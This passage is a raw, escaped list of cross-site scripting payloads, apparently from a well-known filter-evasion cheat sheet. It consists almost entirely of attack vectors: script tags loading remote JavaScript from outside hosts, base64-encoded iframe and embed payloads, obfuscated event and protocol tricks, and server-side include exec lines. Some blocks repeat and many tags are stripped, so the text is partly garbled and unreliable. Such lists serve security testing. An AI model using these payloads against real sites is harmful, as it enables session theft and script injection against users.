STYLE=\\\&quot;(xss.htc);\\\&quot;&gt;\\r\\nalert&#40;\\\'XSS\\\'&#41;;\\r\\n&lt;SCRIPT a=\\\"&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT =\\\"&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT a=\\\"&gt;\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT \\\"a=\\\'&gt;\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT a=`&gt;` SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT a=\\\"&gt;\\\'&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n(\\\"&lt;SCRI\\\");PT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;A HREF=\\\"http://66.102.7.147/\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\"http://www.google.com\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\"http://1113982867/\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\"http://0x42.0x0000066.0x7.0x93/\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\"http://0102.0146.0007.00000223/\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;A HREF=\\\"htt p://6 6.000146.0x7.147/\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;iframe src=\\\" (1) \\\"&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family:\\\'&lt;iframe/=confirm&#40;1&#41;&gt;\\\'\\r\\n&lt;input/=\\\"(1)\\\"\\r\\n&lt;sVg&gt;&lt;scRipt &gt;alert&#40;1&#41; {Opera}\\r\\n&lt;img/src=`` =this.=confirm&#40;1&#41; \\r\\n&lt;form&gt;&lt;isindex formaction=\\\"(1)\\\"\\r\\n&lt;img src=`` =alert&#40;1&#41; \\r\\n&lt;script/ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' / &gt;\\r\\n&lt;ScRipT 5-0*3+9/3=&gt;prompt&#40;1&#41;&lt;/ScRipT giveanswerhere=?\\r\\n&lt;iframe/src=\\\PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\"&gt;\\r\\n&lt;script /**/&gt;/**/alert&#40;1&#41;/**/&lt;/script /**/\\r\\n">&lt;h1/=\\\'\\\alert&#40;1&#41;\\\'&gt;\\r\\n&lt;iframe/src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\" &#11;&gt;X&lt;/a\\r\\nhttp://www.google&lt;script .com&gt;alert)&lt;/script\\r\\n&lt;a href=[&#00;]\\\"&#00; =prompt&#40;1&#41;//\\\"&gt;XYZ&lt;/a\\r\\n&lt;img/src=@ &#13; = prompt&#40;\\\'1\\\'&#41;\\r\\n&lt;style/=prompt&#40;\\\'XSS\\\'&#41;\\r\\n&lt;script ^__^&gt;alert&#40;String.fromCharCode(49&#41;)&lt;/script ^__^\\r\\n&lt;/style &gt;&lt;script :-(&gt;/**/alert)/**/&lt;/script :-(\\r\\n&#00;&lt;/form&gt;&lt;input type=\\\"date\\\" =\\\"alert&#40;1&#41;\\\"&gt;\\r\\n&lt;form&gt;&lt;textarea &#13; =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'&gt;\\r\\n&lt;script /***/&gt;/***/confirm&#40;\\\'\\\a\\\l\\\e\\\r\\\t\\\ᑕ\\\1\\\ᑐ\\\'&#41;/***/&lt;/script /***/\\r\\n&lt;iframe srcdoc=\\\'&lt;body &gt;\\\'&gt;\\r\\n&lt;a href=\\\"(0)\\\" = (1) &gt;X&lt;/a&gt;\\r\\n&lt;script ~~~&gt;alert&#40;0%0&#41;&lt;/script ~~~&gt;\\r\\n&lt;style/=&lt;!-- > alert &#40;1&#41;&gt;\\r\\n&lt;///style///&gt;&lt;span / =\\\'alert&#40;1&#41;\\\'&gt;SPAN\\r\\n&lt;img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' = prompt&#40;1&#41;\\r\\n">&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/=confirm&#40;1&#41;&gt;\\\'\\r\\n&#13;&lt;blink/&#13; =prompt&#40;1&#41;&gt; {Firefox & Opera}\\r\\n&lt;marquee =\\\'(1)\\\'&gt;^__^\\r\\n&lt;div/style=\\\"width:confirm&#40;1&#41;)\\\"&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=(1)\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/=prompt&#40;1&#41; /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/=this.=confirm&#40;1&#41;&gt;\\\'&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/href=\\\"; (1)\\\"&gt;&lt;input type=\\\"X\\\"&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/=prompt&#40;1&#41;\\r\\n&lt;/svg&gt;\\\'\\\'&lt;svg&gt;&lt;script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'&gt;alert&#40;1&#41; {Opera}\\r\\n&lt;a href=\\\"\\\alert&#40;1&#41;\\\"&gt;&lt;button&gt;\\r\\n&lt;div =\\\'alert&#40;1&#41;\\\'&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" =\\\"prompt&#40;1&#41;\\\"&gt;\\r\\n&lt;a href=\\\"(1)\\\"&gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;var =\\\"prompt&#40;1&#41;\\\"&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a href=()&gt;Click Here&lt;/a&gt;\\r\\n&lt;img src=\\\"/\\\" =_=\\\" title=\\\"=\\\'prompt&#40;1&#41;\\\'\\\"&gt;\\r\\n&lt;%&lt;!--\\\'%&gt;alert&#40;1&#41;;&lt;/script --&gt;\\r\\n&lt;script src=\\\&lt;svg/=\\\alert&#40;1&#41;&gt;\\\"&gt;X&lt;/a\\r\\n&lt;iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE&gt;\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')&lt;/script U+\\r\\n&lt;script/src=\\\PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\"&gt;\\r\\n&lt;script /**/&gt;/**/alert&#40;1&#41;/**/&lt;/script /**/\\r\\n">&lt;h1/=\\\'\\\alert&#40;1&#41;\\\'&gt;\\r\\n&lt;iframe/src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\" &#11;&gt;X&lt;/a\\r\\nhttp://www.google&lt;script .com&gt;alert)&lt;/script\\r\\n&lt;a href=[&#00;]\\\"&#00; =prompt&#40;1&#41;//\\\"&gt;XYZ&lt;/a\\r\\n&lt;img/src=@ &#13; = prompt&#40;\\\'1\\\'&#41;\\r\\n&lt;style/=prompt&#40;\\\'XSS\\\'&#41;\\r\\n&lt;script ^__^&gt;alert&#40;String.fromCharCode(49&#41;)&lt;/script ^__^\\r\\n&lt;/style &gt;&lt;script :-(&gt;/**/alert)/**/&lt;/script :-(\\r\\n&#00;&lt;/form&gt;&lt;input type=\\\"date\\\" =\\\"alert&#40;1&#41;\\\"&gt;\\r\\n&lt;form&gt;&lt;textarea &#13; =\\\'\\\a\\\l\\\e\\\r\\\t(1)\\\'&gt;\\r\\n&lt;script /***/&gt;/***/confirm&#40;\\\'\\\a\\\l\\\e\\\r\\\t\\\ᑕ\\\1\\\ᑐ\\\'&#41;/***/&lt;/script /***/\\r\\n&lt;iframe srcdoc=\\\'&lt;body &gt;\\\'&gt;\\r\\n&lt;a href=\\\"(0)\\\" = (1) &gt;X&lt;/a&gt;\\r\\n&lt;script ~~~&gt;alert&#40;0%0&#41;&lt;/script ~~~&gt;\\r\\n&lt;style/=&lt;!-- > alert &#40;1&#41;&gt;\\r\\n&lt;///style///&gt;&lt;span / =\\\'alert&#40;1&#41;\\\'&gt;SPAN\\r\\n&lt;img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' = prompt&#40;1&#41;\\r\\n">&lt;svg&gt;&lt;style&gt;{-o-link-source:\\\'&lt;body/=confirm&#40;1&#41;&gt;\\\'\\r\\n&#13;&lt;blink/&#13; =prompt&#40;1&#41;&gt; {Firefox & Opera}\\r\\n&lt;marquee =\\\'(1)\\\'&gt;^__^\\r\\n&lt;div/style=\\\"width:confirm&#40;1&#41;)\\\"&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe// src=(1)\\r\\n//&lt;form/action=()&gt;&lt;input/type=\\\'submit\\\'&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\"&lt;iframe/src=@\\\"/=prompt&#40;1&#41; /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src:\\\'&lt;style/=this.=confirm&#40;1&#41;&gt;\\\'&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/href=\\\"; (1)\\\"&gt;&lt;input type=\\\"X\\\"&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/=prompt&#40;1&#41;\\r\\n&lt;/svg&gt;\\\'\\\'&lt;svg&gt;&lt;script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'&gt;alert&#40;1&#41; {Opera}\\r\\n&lt;a href=\\\"\\\alert&#40;1&#41;\\\"&gt;&lt;button&gt;\\r\\n&lt;div =\\\'alert&#40;1&#41;\\\'&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe style=\\\"xg-p:absolute;top:0;left:0;width:100%;height:100%\\\" =\\\"prompt&#40;1&#41;\\\"&gt;\\r\\n&lt;a href=\\\"(1)\\\"&gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\"&gt;\\r\\n&lt;var =\\\"prompt&#40;1&#41;\\\"&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a href=()&gt;Click Here&lt;/a&gt;\\r\\n&lt;img src=\\\"/\\\" =_=\\\" title=\\\"=\\\'prompt&#40;1&#41;\\\'\\\"&gt;\\r\\n&lt;%&lt;!--\\\'%&gt;alert&#40;1&#41;;&lt;/script --&gt;\\r\\n&lt;script src=\\\&lt;svg/=\\\alert&#40;1&#41;&gt;\\\"&gt;X&lt;/a\\r\\n&lt;iframe/=\\\a\\\l\\\e\\\r\\\t(\\\'\\\a\\\') worksinIE&gt;\\r\\n~\\\'\\\a\\\' ; \\\t\\\h\\\r\\\o\\\w ~ \\\t\\\h\\\i\\\s. \\\a\\\l\\\e\\\r\\\t(~\\\'\\\a\\\')&lt;/script U+\\r\\n&lt;script/src=\\\PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;EMBED SRC=\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\n&lt;SCRIPT a=\\\"&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT a=\\\"&gt;\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT \\\"a=\\\'&gt;\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT a=\\\"&gt;\\\'&gt;\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n(\\\"&lt;SCRI\\\");PT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;alert&#40;\\\"XSS\\\"&#41;;//&lt;\\r\\n&lt;\\\"\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)&lt;?/SCRIPT&gt;&submit.x=27&submit.y=9&cmd=search\\r\\nalert&#40;\\\"hellox worldss\\\"&#41;&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\\r\\nalert&#40;\\\"XSS\\\"&#41;;&search=1\\r\\n0&q=\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert%2?8String.fromCharCode(88,83,83))//\\\";alert&#40;String.fromCharCode?(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;%?29//--&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83%?2C83&#41;)&submit-frmGoogleWeb=Web+Search\\r\\n&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;\\r\\n&lt;BODY =alert&#40;\\\'hellox worldss\\\'&#41;&gt;\\r\\n&lt;input =write(XSS) autofocus&gt;\\r\\n&lt;input =write(XSS) autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;body =alert&#40;XSS&#41;&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form&gt;&lt;button formaction=\\\"(XSS)\\\"&gt;lol\\r\\n&lt;!--&lt;img src=\\\"--&gt;&lt;img src=x =alert&#40;XSS&#41;//\\\"&gt;\\r\\n&lt;![&gt;&lt;img src=\\\"]&gt;&lt;img src=x =alert&#40;XSS&#41;//\\\"&gt;\\r\\n&lt;style&gt;&lt;img src=\\\"&lt;/style&gt;&lt;img src=x =alert&#40;XSS&#41;//\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;&lt;x foo=\\\'?&gt;alert&#40;1&#41;\\\'&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"[[[Inception]]\\\"&gt;&lt;x foo=\\\"]foo&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\"%&gt;alert&#40;123&#41;\\\"&gt;\\r\\n&lt;div style=\\\"font-family:\\\'foo ;color:red;\\\';\\\"&gt;LOL\\r\\nLOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;\\r\\n({0:#0=alert/#0#/#0#(0)})\\r\\n&lt;svg xmlns=\\\"http://www.w3.org/2000/svg\\\"&gt;LOLalert&#40;123&#41;&lt;/svg&gt;\\r\\n\\r\\n\\\\\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\n&lt;/TITLE&gt;\\r\\n&lt;INPUT TYPE=\\\\\\\"IMAGE\\\\\\\" SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;BODY BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\"&gt;\\r\\n&lt;BODY &gt;\\r\\n<IMG >\\r\\n<IMG >\\r\\n&lt;BGSOUND SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n<BR SIZE=\\\\\\\"&{alert&#40;\\\'XSS\\\'&#41;}\\\\\\\">\\r\\n&lt;LAYER SRC=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"&gt;&lt;/LAYER&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;LINK REL=\\\\\\\"stylesheet\\\\\\\" HREF=\\\\\\\"http://ha.ckers.org/xss.css\\\\\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'http://ha.ckers.org/xss.css\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\\\\\"Link\\\\\\\" Content=\\\\\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\\\\\">\\r\\n&lt;STYLE&gt;BODY{:url(\\\\\\\"http://ha.ckers.org/xssmoz.xml#xss\\\\\\\")}&lt;/STYLE&gt;\\r\\n<XSS >\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;<UL><LI>XSS\\r\\n<IMG >\\r\\n<IMG >\\r\\n<IMG >\\>\\>\\>&>\\r\\n<TABLE><TD BACKGROUND=\\\\\\\"(\\\'XSS\\\')\\\\\\\">\\r\\n<DIV url((\\\'XSS\\\'))\\\\\\\">\\r\\n<DIV >\\r\\n<DIV url((\\\'XSS\\\'))\\\\\\\">\\r\\n<DIV alert&#40;\\\'XSS\\\'&#41;);\\\\\\\">\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n<IMG >\\>\\r\\nexp/*<A >\\r\\n&lt;STYLE TYPE=\\\\\\\"text/javascript\\\\\\\"&gt;alert&#40;\\\'XSS\\\'&#41;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\");}&lt;/STYLE&gt;<A ></A>\\r\\n&lt;STYLE type=\\\\\\\"text/css\\\\\\\"&gt;BODY{background:url(\\\\\\\"(\\\'XSS\\\')\\\\\\\")}&lt;/STYLE&gt;\\r\\n&lt;!--[if gte IE 4]>\\r\\n\\r\\n<![endif]--&gt;\\r\\n&lt;BASE HREF=\\\\\\\"(\\\'XSS\\\');//\\\\\\\"&gt;\\r\\n&lt;OBJECT TYPE=\\\\\\\"text/x-scriptlet\\\\\\\" DATA=\\\\\\\"http://ha.ckers.org/scriptlet.html\\\\\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;<param name=url value=(\\\'XSS\\\')>&lt;/OBJECT&gt;\\r\\n&lt;EMBED SRC=\\\\\\\"http://ha.ckers.org/xss.swf\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\n&lt;EMBED SRC=\\\\\\\PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\" type=\\\\\\\"image/svg+xml\\\\\\\" AllowScriptAccess=\\\\\\\"always\\\\\\\"&gt;&lt;/EMBED&gt;\\r\\na=\\\\\\\"get\\\\\\\";\\r\\nb=\\\\\\\"URL(\\\\\\\\\\\"\\\\\\\";\\r\\nc=\\\\\\\"\\\\\\\";\\r\\nd=\\\\\\\"alert&#40;\\\'XSS\\\'&#41;;\\\\\\\\\\\")\\\\\\\";\\r\\neval&#40;a+b+c+d&#41;;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\\\\\"xss\\\\\\\" implementation=\\\\\\\"http://ha.ckers.org/xss.htc\\\\\\\"><xss:xss>XSS</xss:xss>&lt;/HTML&gt;\\r\\n&lt;XML ID=I&gt;<X><C>&lt;![CDATA[<IMG >&lt;![CDATA[cript:alert&#40;\\\'XSS\\\'&#41;;\\\\\\\">]]>\\r\\n</C></X>&lt;/xml&gt;<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\\r\\n&lt;XML ID=\\\\\\\"xss\\\\\\\"&gt;<I><B><IMG >cript:alert&#40;\\\'XSS\\\'&#41;\\\\\\\"></B></I>&lt;/XML&gt;\\r\\n<SPAN DATASRC=\\\\\\\"#xss\\\\\\\" DATAFLD=\\\\\\\"B\\\\\\\" DATAFORMATAS=\\\\\\\"HTML\\\\\\\"></SPAN>\\r\\n&lt;XML SRC=\\\\\\\"xsstest.xml\\\\\\\" ID=I&gt;&lt;/XML&gt;\\r\\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\\r\\n&lt;HTML&gt;&lt;BODY&gt;\\r\\n&lt;?xml:namespace prefix=\\\\\\\"t\\\\\\\" ns=\\\\\\\"urn:schemas-microsoft-com:time\\\\\\\">\\r\\n&lt;?import namespace=\\\\\\\"t\\\\\\\" implementation=\\\\\\\"#default#time2\\\\\\\">\\r\\n<t:set attributeName=\\\\\\\"innerHTML\\\\\\\" to=\\\\\\\"XSSalert&#40;"XSS"&#41;\\\\\\\">\\r\\n&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n\\r\\n&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'<SCR\\\'\\\\\\\"--&gt;&lt;!--#exec cmd=\\\\\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js>\\\'\\\\\\\"--&gt;\\r\\n&lt;? echo(\\\'<SCR)\\\';\\r\\necho(\\\'IPT>alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\'); ?&gt;\\r\\n<IMG >\\>\\>\\>\\>\\>\\r\\n\\\'>\\\\\\\" SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\nPT SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\">\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n<A >XSS</A>\\r\\n&lt;\\r\\n&lt;\\r\\n&lt\\r\\n&lt;\\r\\n&LT\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3c\\r\\n&#X03c\\r\\n&#X003c\\r\\n&#X0003c\\r\\n&#X00003c\\r\\n&#X000003c\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3C\\r\\n&#X03C\\r\\n&#X003C\\r\\n&#X0003C\\r\\n&#X00003C\\r\\n&#X000003C\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\&lt;\\r\\n\\\&lt;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html&gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\n\\r\\n&lt;IMG &gt;\\r\\nperl -e \\\'print \\\\\\\"&lt;SCR\\\\0IPT&gt;alert&#40;\\\\\\\\\\\"XSS\\\\\\\\\\\"&#41;&lt;/SCR\\\\0IPT&gt;\\\\\\\";\\\' &gt; out\\r\\nperl -e \\\'print \\\\\\\"&lt;IMG &gt;\\\\\\\";\\\' &gt; out\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG \\\\\\\"\\\\\\\"\\\\\\\"&gt;\\\\\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n\\r\\n\\\'\\\';!--\\\\\\\"&lt;XSS&gt;=&{()}\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\\\\\"&gt;\\\'&gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=javascrscriptipt:alert&#40;\\\'XSS\\\'&#41;&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;alert&#40;\\\"XSS\\\"&#41;\\\"&gt;\\r\\n&lt;IMG SRC=\\\" &#14; (\\\'XSS\\\');\\\"&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;alert&#40;\\\"XSS\\\"&#41;;//&lt;\\r\\na=/XSS/alert&#40;a.source&#41;\\r\\n\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\n&lt;/TITLE&gt;alert&#40;\\\"XSS\\\"&#41;;\\r\\nalert&#40;"XSS"&#41;\\\"&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n(\\\"&lt;SCRI\\\");PT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;form id=\\\"test\\\" /&gt;&lt;button form=\\\"test\\\" formaction=\\\"(123)\\\"&gt;TESTHTML5FORMACTION\\r\\n&lt;form&gt;&lt;button 